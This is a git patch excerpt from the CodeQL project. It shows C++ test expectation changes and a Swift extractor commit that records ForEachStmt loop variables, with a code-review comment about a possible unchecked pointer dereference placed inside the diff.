stl.h:217:33:217:35 | get | 0 | char_type & | 
@@ -989,49 +889,26 @@ getParameterTypeName | stl.h:226:32:226:38 | getline | 1 | streamsize | | stl.h:226:32:226:38 | getline | 2 | char_type | | stl.h:229:68:229:77 | operator>> | 0 | basic_istream & | -| stl.h:229:68:229:77 | operator>> | 0 | basic_istream> & | -| stl.h:229:68:229:77 | operator>> | 1 | char * | | stl.h:229:68:229:77 | operator>> | 1 | func:0 * | | stl.h:230:85:230:94 | operator>> | 0 | basic_istream & | -| stl.h:230:85:230:94 | operator>> | 0 | basic_istream> & | | stl.h:230:85:230:94 | operator>> | 1 | basic_string & | -| stl.h:230:85:230:94 | operator>> | 1 | basic_string, allocator> & | | stl.h:232:84:232:90 | getline | 0 | basic_istream & | -| stl.h:232:84:232:90 | getline | 0 | basic_istream> & | | stl.h:232:84:232:90 | getline | 1 | basic_string & | -| stl.h:232:84:232:90 | getline | 1 | basic_string, allocator> & | -| stl.h:232:84:232:90 | getline | 2 | char | | stl.h:232:84:232:90 | getline | 2 | func:0 | | stl.h:233:84:233:90 | getline | 0 | basic_istream & | -| stl.h:233:84:233:90 | getline | 0 | basic_istream> & | | stl.h:233:84:233:90 | getline | 1 | basic_string & | -| stl.h:233:84:233:90 | getline | 1 | basic_string, allocator> & | | stl.h:240:33:240:42 | operator<< | 0 | int | | stl.h:242:33:242:35 | put | 0 | char_type | | stl.h:243:33:243:37 | write | 0 | const char_type * | | stl.h:243:33:243:37 | write | 1 | streamsize | | stl.h:247:67:247:76 | operator<< | 0 | basic_ostream & | -| stl.h:247:67:247:76 | operator<< | 0 | basic_ostream> & | -| stl.h:247:67:247:76 | operator<< | 1 | const char * | | stl.h:247:67:247:76 | operator<< | 1 | const func:0 * | | stl.h:248:85:248:94 | operator<< | 0 | basic_ostream & | -| stl.h:248:85:248:94 | operator<< | 0 | basic_ostream> & | | stl.h:248:85:248:94 | operator<< | 1 | const basic_string & | -| stl.h:248:85:248:94 | operator<< | 1 | const basic_string, allocator> & | | stl.h:259:12:259:29 | basic_stringstream | 0 | const basic_string & | -| stl.h:259:12:259:29 | basic_stringstream | 0 | 
const basic_string, allocator> & | | stl.h:263:23:263:31 | operator= | 0 | basic_stringstream && | -| stl.h:263:23:263:31 | operator= | 0 | basic_stringstream, allocator> && | | stl.h:265:8:265:11 | swap | 0 | basic_stringstream & | -| stl.h:265:8:265:11 | swap | 0 | basic_stringstream, allocator> & | | stl.h:268:8:268:10 | str | 0 | const basic_string & | -| stl.h:268:8:268:10 | str | 0 | const basic_string, allocator> & | -| stl.h:293:12:293:17 | vector | 0 | const allocator & | -| stl.h:293:12:293:17 | vector | 0 | const allocator & | -| stl.h:293:12:293:17 | vector | 0 | const allocator & | -| stl.h:293:12:293:17 | vector | 0 | const allocator & | -| stl.h:293:12:293:17 | vector | 0 | const allocator & | -| stl.h:293:12:293:17 | vector | 0 | const allocator, allocator>> & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | | stl.h:293:12:293:17 | vector | 0 | const class:1 & | @@ -1041,9 +918,6 @@ getParameterTypeName | stl.h:294:12:294:17 | vector | 0 | size_type | | stl.h:294:12:294:17 | vector | 0 | size_type | | stl.h:294:12:294:17 | vector | 0 | size_type | -| stl.h:294:12:294:17 | vector | 1 | const allocator & | -| stl.h:294:12:294:17 | vector | 1 | const allocator & | -| stl.h:294:12:294:17 | vector | 1 | const allocator>> & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | | stl.h:294:12:294:17 | vector | 1 | const class:1 & | 
@@ -1051,20 +925,13 @@ getParameterTypeName | stl.h:295:3:295:8 | vector | 0 | size_type | | stl.h:295:3:295:8 | vector | 1 | const class:0 & | | stl.h:295:3:295:8 | vector | 1 | const class:0 & | -| stl.h:295:3:295:8 | vector | 1 | const int & | -| stl.h:295:3:295:8 | vector | 1 | const short & | -| stl.h:295:3:295:8 | vector | 2 | const allocator & | -| stl.h:295:3:295:8 | vector | 2 | const allocator & | | stl.h:295:3:295:8 | vector | 2 | const class:1 & | | stl.h:295:3:295:8 | vector | 2 | const class:1 & | | stl.h:296:101:296:106 | vector | 0 | func:0 | | stl.h:296:101:296:106 | vector | 1 | func:0 | -| stl.h:296:101:296:106 | vector | 2 | const allocator & | | stl.h:296:101:296:106 | vector | 2 | const class:1 & | | stl.h:301:11:301:19 | operator= | 0 | const vector & | -| stl.h:301:11:301:19 | operator= | 0 | const vector> & | | stl.h:302:11:302:19 | operator= | 0 | vector && | -| stl.h:302:11:302:19 | operator= | 0 | vector> && | | stl.h:303:106:303:111 | assign | 0 | func:0 | | stl.h:303:106:303:111 | assign | 1 | func:0 | | stl.h:306:8:306:13 | assign | 0 | size_type | @@ -1073,9 +940,6 @@ getParameterTypeName | stl.h:306:8:306:13 | assign | 1 | const class:0 & | | stl.h:306:8:306:13 | assign | 1 | const class:0 & | | stl.h:306:8:306:13 | assign | 1 | const class:0 & | -| stl.h:306:8:306:13 | assign | 1 | const float & | -| stl.h:306:8:306:13 | assign | 1 | const int & | -| stl.h:306:8:306:13 | assign | 1 | const int *const & | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | 
@@ -1083,15 +947,11 @@ getParameterTypeName | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:315:13:315:22 | operator[] | 0 | size_type | | stl.h:318:13:318:14 | at | 0 | size_type | -| stl.h:327:8:327:16 | push_back | 0 | const MyPair & | -| stl.h:327:8:327:16 | push_back | 0 | const MyVectorContainer & | | stl.h:327:8:327:16 | push_back | 0 | const class:0 & | | stl.h:327:8:327:16 | push_back | 0 | const class:0 & | | stl.h:328:8:328:16 | push_back | 0 | class:0 && | -| stl.h:328:8:328:16 | push_back | 0 | int && | | stl.h:331:12:331:17 | insert | 0 | const_iterator | | stl.h:331:12:331:17 | insert | 1 | class:0 && | -| stl.h:331:12:331:17 | insert | 1 | int && | | stl.h:333:42:333:47 | insert | 0 | const_iterator | | stl.h:333:42:333:47 | insert | 0 | const_iterator | | stl.h:333:42:333:47 | insert | 1 | func:0 | 
@@ -1102,38 +962,21 @@ getParameterTypeName | stl.h:335:37:335:43 | emplace | 1 | func:0 && | | stl.h:336:33:336:44 | emplace_back | 0 | func:0 && | | stl.h:338:8:338:11 | swap | 0 | vector & | -| stl.h:338:8:338:11 | swap | 0 | vector> & | | stl.h:351:12:351:21 | shared_ptr | 0 | class:0 * | -| stl.h:351:12:351:21 | shared_ptr | 0 | int * | | stl.h:352:3:352:12 | shared_ptr | 0 | const shared_ptr & | | stl.h:352:3:352:12 | shared_ptr | 0 | const shared_ptr & | -| stl.h:369:12:369:21 | unique_ptr | 0 | A * | | stl.h:369:12:369:21 | unique_ptr | 0 | class:0 * | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | | stl.h:380:52:380:62 | make_unique | 0 | func:1 && | -| stl.h:380:52:380:62 | make_unique | 0 | int && | -| stl.h:380:52:380:62 | make_unique | 0 | int && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | | stl.h:382:52:382:62 | make_shared | 0 | func:1 && | -| stl.h:382:52:382:62 | make_shared | 0 | int && | -| stl.h:382:52:382:62 | make_shared | 0 | int && | -| stl.h:396:3:396:3 | pair | 0 | char *const & | -| stl.h:396:3:396:3 | pair | 0 | char *const & | -| stl.h:396:3:396:3 | pair | 0 | const char *const & | -| stl.h:396:3:396:3 | pair | 0 | const char *const & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | | stl.h:396:3:396:3 | pair | 0 | const class:0 & | -| stl.h:396:3:396:3 | pair | 0 | const pair & | -| stl.h:396:3:396:3 | pair | 1 | char *const & | -| stl.h:396:3:396:3 | pair | 1 | char *const & | -| stl.h:396:3:396:3 | pair | 1 | const char *const & | -| stl.h:396:3:396:3 | pair | 1 | const char *const & | -| stl.h:396:3:396:3 | pair | 1 | const char *const & | | stl.h:396:3:396:3 | pair | 1 | const class:1 & | | stl.h:396:3:396:3 | pair | 1 | const class:1 & | | 
stl.h:396:3:396:3 | pair | 1 | const class:1 & | @@ -1152,24 +995,12 @@ getParameterTypeName | stl.h:397:30:397:33 | pair | 0 | const pair & | | stl.h:397:30:397:33 | pair | 0 | const pair & | | stl.h:399:8:399:11 | swap | 0 | pair & | -| stl.h:402:72:402:72 | make_pair | 0 | char *&& | -| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[2] | -| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[2] | -| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[4] | -| stl.h:402:72:402:72 | make_pair | 0 | const char(&)[4] | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | | stl.h:402:72:402:72 | make_pair | 0 | func:0 && | -| stl.h:402:72:402:72 | make_pair | 0 | pair && | -| stl.h:402:72:402:72 | make_pair | 1 | char *&& | -| stl.h:402:72:402:72 | make_pair | 1 | char *&& | -| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[2] | -| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | -| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | -| stl.h:402:72:402:72 | make_pair | 1 | const char(&)[4] | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | @@ -1177,9 +1008,7 @@ getParameterTypeName | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:402:72:402:72 | make_pair | 1 | func:1 && | | stl.h:422:3:422:5 | map | 0 | const map & | -| stl.h:422:3:422:5 | map | 0 | const map, allocator>> & | | stl.h:426:8:426:16 | operator= | 0 | const map & | -| stl.h:426:8:426:16 | operator= | 0 | const map, allocator>> & | | stl.h:435:6:435:15 | operator[] | 0 | key_type && | | stl.h:435:6:435:15 | operator[] | 0 | key_type && | | stl.h:436:6:436:7 | at | 0 | const key_type & | 
@@ -1209,19 +1038,14 @@ getParameterTypeName | stl.h:454:30:454:45 | insert_or_assign | 2 | func:0 && | | stl.h:456:12:456:16 | erase | 0 | iterator | | stl.h:459:8:459:11 | swap | 0 | map & | -| stl.h:459:8:459:11 | swap | 0 | map, allocator>> & | | stl.h:462:27:462:31 | merge | 0 | map & | -| stl.h:462:27:462:31 | merge | 0 | map>> & | | stl.h:465:12:465:15 | find | 0 | const key_type & | | stl.h:468:12:468:22 | lower_bound | 0 | const key_type & | | stl.h:470:12:470:22 | upper_bound | 0 | const key_type & | | stl.h:473:28:473:38 | equal_range | 0 | const key_type & | | stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map & | | stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map & | -| stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map, equal_to, allocator>> & | -| stl.h:490:3:490:15 | unordered_map | 0 | const unordered_map, hash, equal_to, allocator>>> & | | stl.h:494:18:494:26 | operator= | 0 | const unordered_map & | -| stl.h:494:18:494:26 | operator= | 0 | const unordered_map, equal_to, allocator>> & | | stl.h:503:16:503:25 | operator[] | 0 | key_type && | | stl.h:503:16:503:25 | operator[] | 0 | key_type && | | stl.h:504:16:504:17 | at | 0 | const key_type & | 
@@ -1260,17 +1084,13 @@ getParameterTypeName | stl.h:522:30:522:45 | insert_or_assign | 2 | func:0 && | | stl.h:524:12:524:16 | erase | 0 | iterator | | stl.h:527:8:527:11 | swap | 0 | unordered_map & | -| stl.h:527:8:527:11 | swap | 0 | unordered_map, equal_to, allocator>> & | | stl.h:530:37:530:41 | merge | 0 | unordered_map & | -| stl.h:530:37:530:41 | merge | 0 | unordered_map>> & | | stl.h:533:12:533:15 | find | 0 | const key_type & | | stl.h:536:28:536:38 | equal_range | 0 | const key_type & | | stl.h:555:3:555:5 | set | 0 | const set & | -| stl.h:555:3:555:5 | set | 0 | const set, allocator> & | | stl.h:557:33:557:35 | set | 0 | func:0 | | stl.h:557:33:557:35 | set | 1 | func:0 | | stl.h:560:8:560:16 | operator= | 0 | const set & | -| stl.h:560:8:560:16 | operator= | 0 | const set, allocator> & | | stl.h:568:48:568:54 | emplace | 0 | func:0 && | | stl.h:568:48:568:54 | emplace | 0 | func:0 && | | stl.h:569:36:569:47 | emplace_hint | 0 | const_iterator | 
@@ -1284,20 +1104,16 @@ getParameterTypeName | stl.h:574:38:574:43 | insert | 1 | func:0 | | stl.h:576:12:576:16 | erase | 0 | iterator | | stl.h:579:8:579:11 | swap | 0 | set & | -| stl.h:579:8:579:11 | swap | 0 | set, allocator> & | | stl.h:582:27:582:31 | merge | 0 | set & | -| stl.h:582:27:582:31 | merge | 0 | set> & | | stl.h:585:12:585:15 | find | 0 | const key_type & | | stl.h:588:12:588:22 | lower_bound | 0 | const key_type & | | stl.h:590:12:590:22 | upper_bound | 0 | const key_type & | | stl.h:592:28:592:38 | equal_range | 0 | const key_type & | | stl.h:609:3:609:15 | unordered_set | 0 | const unordered_set & | -| stl.h:609:3:609:15 | unordered_set | 0 | const unordered_set, equal_to, allocator> & | | stl.h:611:33:611:45 | unordered_set | 0 | func:0 | | stl.h:611:33:611:45 | unordered_set | 1 | func:0 | | stl.h:611:33:611:45 | unordered_set | 2 | size_type | | stl.h:614:18:614:26 | operator= | 0 | const unordered_set & | -| stl.h:614:18:614:26 | operator= | 0 | const unordered_set, equal_to, allocator> & | | stl.h:622:48:622:54 | emplace | 0 | func:0 && | | stl.h:622:48:622:54 | emplace | 0 | func:0 && | | stl.h:623:36:623:47 | emplace_hint | 0 | const_iterator | 
@@ -1311,21 +1127,17 @@ getParameterTypeName | stl.h:628:38:628:43 | insert | 1 | func:0 | | stl.h:630:12:630:16 | erase | 0 | iterator | | stl.h:633:8:633:11 | swap | 0 | unordered_set & | -| stl.h:633:8:633:11 | swap | 0 | unordered_set, equal_to, allocator> & | | stl.h:636:37:636:41 | merge | 0 | unordered_set & | -| stl.h:636:37:636:41 | merge | 0 | unordered_set> & | | stl.h:639:12:639:15 | find | 0 | const key_type & | | stl.h:641:28:641:38 | equal_range | 0 | const key_type & | | stl.h:671:21:671:39 | basic_format_string | 0 | const func:0 & | | stl.h:671:21:671:39 | basic_format_string | 0 | const func:0 & | | stl.h:678:33:678:38 | format | 0 | format_string | | stl.h:678:33:678:38 | format | 0 | format_string | -| stl.h:678:33:678:38 | format | 1 | char *&& | | stl.h:678:33:678:38 | format | 1 | func:0 && | | stl.h:678:33:678:38 | format | 1 | func:0 && | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 0 | format_string | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 1 | func:0 && | -| stl.h:683:6:683:48 | same_signature_as_format_but_different_name | 1 | int & | | string.cpp:17:6:17:9 | sink | 0 | const char * | | string.cpp:18:6:18:9 | sink | 0 | const string & | | string.cpp:19:6:19:9 | sink | 0 | const char * | @@ -1344,7 +1156,6 @@ getParameterTypeName | structlikeclass.cpp:5:7:5:7 | operator= | 0 | StructLikeClass && | | structlikeclass.cpp:5:7:5:7 | operator= | 0 | const StructLikeClass & | | structlikeclass.cpp:8:2:8:16 | StructLikeClass | 0 | int | -| swap1.cpp:14:9:14:9 | move | 0 | Class & | | swap1.cpp:14:9:14:9 | move | 0 | func:0 & | | swap1.cpp:24:9:24:13 | Class | 0 | Class && | | swap1.cpp:25:9:25:13 | Class | 0 | const Class & | 
@@ -1355,7 +1166,6 @@ getParameterTypeName | swap1.cpp:53:14:53:17 | swap | 0 | Class & | | swap1.cpp:61:10:61:13 | swap | 0 | Class & | | swap1.cpp:61:10:61:13 | swap | 1 | Class & | -| swap2.cpp:14:9:14:9 | move | 0 | Class & | | swap2.cpp:14:9:14:9 | move | 0 | func:0 & | | swap2.cpp:24:9:24:13 | Class | 0 | Class && | | swap2.cpp:25:9:25:13 | Class | 0 | const Class & | @@ -1367,9 +1177,7 @@ getParameterTypeName | swap2.cpp:61:10:61:13 | swap | 0 | Class & | | swap2.cpp:61:10:61:13 | swap | 1 | Class & | | swap.h:4:20:4:23 | swap | 0 | func:0 & | -| swap.h:4:20:4:23 | swap | 0 | int & | | swap.h:4:20:4:23 | swap | 1 | func:0 & | -| swap.h:4:20:4:23 | swap | 1 | int & | | taint.cpp:4:6:4:21 | arithAssignments | 0 | int | | taint.cpp:4:6:4:21 | arithAssignments | 1 | int | | taint.cpp:22:5:22:13 | increment | 0 | int | @@ -1554,7 +1362,6 @@ getParameterTypeName | taint.cpp:783:5:783:11 | fopen_s | 2 | const char * | | taint.cpp:785:6:785:15 | fopen_test | 0 | char * | | vector.cpp:13:6:13:9 | sink | 0 | int | -| vector.cpp:14:27:14:30 | sink | 0 | vector, allocator>, allocator, allocator>>> & | | vector.cpp:14:27:14:30 | sink | 0 | vector> & | | vector.cpp:14:27:14:30 | sink | 0 | vector> & | | vector.cpp:16:6:16:37 | test_range_based_for_loop_vector | 0 | int | From 814218c7a830f8c9aaec19ed1fb24ebca8622607 Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli Date: Thu, 28 Nov 2024 10:52:17 +0100 Subject: [PATCH 0754/1267] Swift: extract variables as children of `ForEachStmt` --- .../extractor/translators/StmtTranslator.cpp | 11 ++++++++++ swift/ql/.generated.list | 15 ++++++++----- swift/ql/.gitattributes | 7 ++++++- .../swift/elements/stmt/ForEachStmt.qll | 1 + .../codeql/swift/generated/ParentChild.qll | 14 +++++++++---- swift/ql/lib/codeql/swift/generated/Raw.qll | 5 +++++ .../swift/generated/stmt/ForEachStmt.qll | 21 +++++++++++++++++++ swift/ql/lib/swift.dbscheme | 7 +++++++ .../stmt/ForEachStmt/ForEachStmt.expected | 3 +++ .../generated/stmt/ForEachStmt/ForEachStmt.ql | 20 ++++++++++++++++++ .../ForEachStmt_getIteratorVar.expected | 2 ++ .../ForEachStmt/ForEachStmt_getIteratorVar.ql | 7 +++++++ .../ForEachStmt/ForEachStmt_getLabel.expected | 0 .../stmt/ForEachStmt/ForEachStmt_getLabel.ql | 7 +++++++ .../ForEachStmt_getNextCall.expected | 2 ++ .../ForEachStmt/ForEachStmt_getNextCall.ql | 7 +++++++ .../ForEachStmt_getVariable.expected | 5 +++++ .../ForEachStmt/ForEachStmt_getVariable.ql | 7 +++++++ .../ForEachStmt/ForEachStmt_getWhere.expected | 1 + .../stmt/ForEachStmt/ForEachStmt_getWhere.ql | 7 +++++++ .../stmt/ForEachStmt/MISSING_SOURCE.txt | 4 ---- .../generated/stmt/ForEachStmt/for.swift | 19 +++++++++++++++++ .../expr/methodlookup/PrintAst.expected | 2 ++ swift/schema.py | 1 + 24 files changed, 161 insertions(+), 14 deletions(-) create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.expected create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt.ql create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.expected create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getIteratorVar.ql create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.expected create mode 100644 
swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getLabel.ql create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.expected create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getNextCall.ql create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.expected create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getVariable.ql create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.expected create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/ForEachStmt_getWhere.ql delete mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/MISSING_SOURCE.txt create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/for.swift
diff --git a/swift/extractor/translators/StmtTranslator.cpp b/swift/extractor/translators/StmtTranslator.cpp
index a433c93f406..f46411e6f12 100644
--- a/swift/extractor/translators/StmtTranslator.cpp
+++ b/swift/extractor/translators/StmtTranslator.cpp
@@ -77,6 +77,17 @@ codeql::ForEachStmt StmtTranslator::translateForEachStmt(const swift::ForEachStm
 entry.iteratorVar = dispatcher.fetchLabel(stmt.getIteratorVar());
 entry.where = dispatcher.fetchOptionalLabel(stmt.getWhere());
 entry.nextCall = dispatcher.fetchOptionalLabel(stmt.getNextCall());
+ auto add_variable = [&](swift::VarDecl* var) {
+ entry.variables.push_back(dispatcher.fetchLabel(var));
+ };
+ if (auto pattern = stmt.getPattern()) {
+ pattern->forEachVariable(add_variable);
+ }
+ if (auto iteratorVar = stmt.getIteratorVar()) {
+ for (auto i = 0u; i < iteratorVar->getNumPatternEntries(); ++i) {
+ iteratorVar->getPattern(i)->forEachVariable(add_variable);
+ }
+ }
 return entry;
 }
diff --git a/swift/ql/.generated.list b/swift/ql/.generated.list
index da39f2f2fe7..dec8b487f0b 100644
--- a/swift/ql/.generated.list
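Review bot: `iteratorVar->getPattern(i)` in the added `for` loop is dereferenced unchecked, while `stmt.getPattern()` and `stmt.getIteratorVar()` a few lines above are both guarded; whether a pattern entry can be null is not visible here, but if it can, the extractor would crash on that statement instead of skipping the entry. A guard in the same style would be `if (auto p = iteratorVar->getPattern(i)) p->forEachVariable(add_variable);`. The new `if (auto iteratorVar = stmt.getIteratorVar())` also disagrees with the unchanged `entry.iteratorVar = dispatcher.fetchLabel(stmt.getIteratorVar());`, which passes the same pointer unconditionally, so it is worth confirming which of the two reflects the real contract. I would add a comment above the lambda such as `// pattern variables first, then iterator variables: this order is the getVariable(index) order`, since the push order fixes the indices the QL side exposes. `translateForEachStmt` begins above the hunk.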
+++ b/swift/ql/.generated.list @@ -463,7 +463,7 @@ lib/codeql/swift/elements/stmt/DoCatchStmt.qll a4639b674880e85d15ef4077370eb2ff2 lib/codeql/swift/elements/stmt/DoStmt.qll 2117eb68a82bde082fc06b44d7bdabd6d773abda95555b81e92f6d409a93b462 c5ec1fba5ba562629863ac6d1a15f9bbd8dce9f59326f580997352b47f9f2a90 lib/codeql/swift/elements/stmt/FailStmt.qll 0dc6467b2e6b4852ad6054122601c445f31c5e9c9837ceac132849a37119f7b5 0fac97257b7b2e453c484ca0212e61e655e2b2fa456f030ce159806dee048909 lib/codeql/swift/elements/stmt/FallthroughStmt.qll f7bfad479ed2f3011a4e8ebe3e4a7f3e6b7f832518ac4d2401122b8be32bbc91 2daabb70b723d9f95d4b120ec2774df8c2ba315f9b17f944a65d306f71c0a70f -lib/codeql/swift/elements/stmt/ForEachStmt.qll 70fb1f12a95c14eebd9cb30c53898ca044843ed6b14569f54e52697af7b39f59 6483f1941b7a97f4cc919c578b25da69b783dc9b3ebe4a2839702553ff2f64fb +lib/codeql/swift/elements/stmt/ForEachStmt.qll 328f1036257affc8b4d0d34767d059a33eca599fe7fd69ce4ac9824d3985143c c9a79da4742b8dac82c2760e0c15809dcc237b09603798b9c8368f02e20c5138 lib/codeql/swift/elements/stmt/GuardStmt.qll 69d3a945ec1d7bad4d9157656c5a2388584afa013771e6657313e39b28284b4a 50812bd09f77d8aba1071f03f073bed8951b1b9bb940b424c91f7f10095333cd lib/codeql/swift/elements/stmt/IfStmt.qll f60fb6be6f900c9e7c1a7ae84f0886f6fd5e70cbcc6c77c78d70ed2a62de77a9 a97ae07ef314b199baafa47af4cdc302ebf2f72205a14a28fdfc7db5ce4cfd47 lib/codeql/swift/elements/stmt/LabeledConditionalStmt.qll 64e4b4bedfc1fe74a7685213b22cb43098f669ec2c2947d9096a73e1e90104f3 28459d17878789184c8833eb202cb736ea7f267d728790561b57f60b4b9a2ce9 
@@ -709,10 +709,10 @@ lib/codeql/swift/generated/Locatable.qll 1d37fa20de71c0b9986bfd7a7c0cb82ab7bf3fd lib/codeql/swift/generated/Location.qll 5e20316c3e480ddfe632b7e88e016c19f10a67df1f6ae9c8f128755a6907d6f5 5a0af2d070bcb2ed53d6d0282bf9c60dc64c2dce89c21fdd485e9c7893c1c8fa lib/codeql/swift/generated/MacroRole.qll 0d8fa6b0b6e2045d9097a87d53888cae2ea5371b2fa7d140341cf206f575b556 ea3b8a7c0a88851809f9a5a5aa80b0d2da3c4779bb29044cdba2b60246a2722c lib/codeql/swift/generated/OtherAvailabilitySpec.qll d9feaa2a71acff3184ca389045b0a49d09156210df0e034923d715b432ad594b 046737621a8bcf69bf805afb0cff476bd15259f12f0d77fce3206dd01b31518f -lib/codeql/swift/generated/ParentChild.qll d1814f2bad4c2ba9242ce49fe6fb8564ac99fc1fd3a7d12aa55e5c6dd7bb529b 1a2075b731d07a5e3c6a69d001796c8de925069d839671a294c9cba6c3db724a +lib/codeql/swift/generated/ParentChild.qll b65c29ba8c3e13baac44a32d2521a11f07aeb7d33415aa9a91a7f6255a744415 0fe73d06c96194d5a0da19c9348a46d9f8fbf630fee5de3dc96e997c595c362e lib/codeql/swift/generated/PlatformVersionAvailabilitySpec.qll dc17b49a90a18a8f7607adf2433bc8f0c194fa3e803aa3822f809d4d4fbd6793 be48ea9f8ae17354c8508aaed24337a9e57ce01f288fece3dcecd99776cabcec lib/codeql/swift/generated/PureSynthConstructors.qll bc31a6c4d142fa3fbdcae69d5ba6f1cec00eb9ad92b46c8d7b91ebfa7ef6c1f4 bc31a6c4d142fa3fbdcae69d5ba6f1cec00eb9ad92b46c8d7b91ebfa7ef6c1f4 -lib/codeql/swift/generated/Raw.qll 118b43fedd4265b5aa15c33ef01a2f5a5db6e5597f95bef1078a01c3ff8da983 075aec2c8b232f0361ebf63f07ae9b66163f3975e6023583fb0fa2e40b979a33 +lib/codeql/swift/generated/Raw.qll 2c5cecbc73f87d81a7e6dd6e125115619c1b034712f1906fed084e997bb3fe05 9653595693da55953d7743fbecce33d16910e3b6737c654311f1e34d27ad7f0b lib/codeql/swift/generated/Synth.qll 31e318c6e156848c85a2a2664695b48b5e93c57c9bb22fa29d027069907b3ab0 8655ffcf772f55284b93f1d7f8e1b3d497a9744d5f2e0c17bc322c1fdf8bdba8 lib/codeql/swift/generated/SynthConstructors.qll 3e53c7853096020219c01dae85681fe80b34938d198a0ff359a209dda41c5ed7 
3e53c7853096020219c01dae85681fe80b34938d198a0ff359a209dda41c5ed7 lib/codeql/swift/generated/UnknownFile.qll 247ddf2ebb49ce5ed4bf7bf91a969ddff37de6c78d43d8affccaf7eb586e06f2 452b29f0465ef45e978ef8b647b75e5a2a1e53f2a568fc003bc8f52f73b3fa4d @@ -915,7 +915,7 @@ lib/codeql/swift/generated/stmt/DoCatchStmt.qll 93c2a47088a2849ccf1a5647eba39c1a lib/codeql/swift/generated/stmt/DoStmt.qll 27be70a901a20831fea3d3dcf45d5ba9048043b1894cb04c09dfb3d1c0241cef 48a258a27677170e1d5530eb0001b6c043d96a92e0d056e6fb428b4d7ac4cadd lib/codeql/swift/generated/stmt/FailStmt.qll 72bfd7dc0f3f8219f3cce1a34567fdd127823e2cf42274e171f7ac96eb18afcd cb1027b33e5b601317546acb8915a5985e04b5376ecaea012b3ecdffc22ae814 lib/codeql/swift/generated/stmt/FallthroughStmt.qll 7aa70d87443d03b0ba7ed7c7b57b501abb00a32c5943c99c40735d023cf7a9ef 6451f355980409d0d7d991b9e241324ee2b68be3838440f206f734470c7188fc -lib/codeql/swift/generated/stmt/ForEachStmt.qll b5cadd1b5daa3601d094e79143cf85a731966a3c1e1c6567bcd0d87f33f9196f 13a494dd3cbbc34c8d1caeda7f279c35d971b8fb49823c89cf71675f7d76e6a4 +lib/codeql/swift/generated/stmt/ForEachStmt.qll d2e4bd83e68a432515284273d682ee47dc61860ff1b0769b9c3775ceb8d46140 848ed0efec1a40df27259492c4df1603d6bfcd8622038beac8d9145fc6863de6 lib/codeql/swift/generated/stmt/GuardStmt.qll a957b2d83c92ac7ed18f76faa35cb71b10ce0dcbb88447b57dcdc034341b6fcc 518fad136831573112edf3836e852c82009a654ce256077d953ddc6b86231efb lib/codeql/swift/generated/stmt/IfStmt.qll a1d1af8679fb0881bace45c251f96f3bbb07e8a0312dd5ecab4fc2c07e491682 bad75ae703b23d1b8869be108f095ec242996cdde0dd90b8c1dabe643869da60 lib/codeql/swift/generated/stmt/LabeledConditionalStmt.qll c05bbbdba0ad8e33afdae3a8b201276d95c2b4d1e43b9b58aa4aa17765dc7ca4 c30a5a1350172459bf67760dc912460ecc4f581dd927a98a068d95cb0905f0d9 
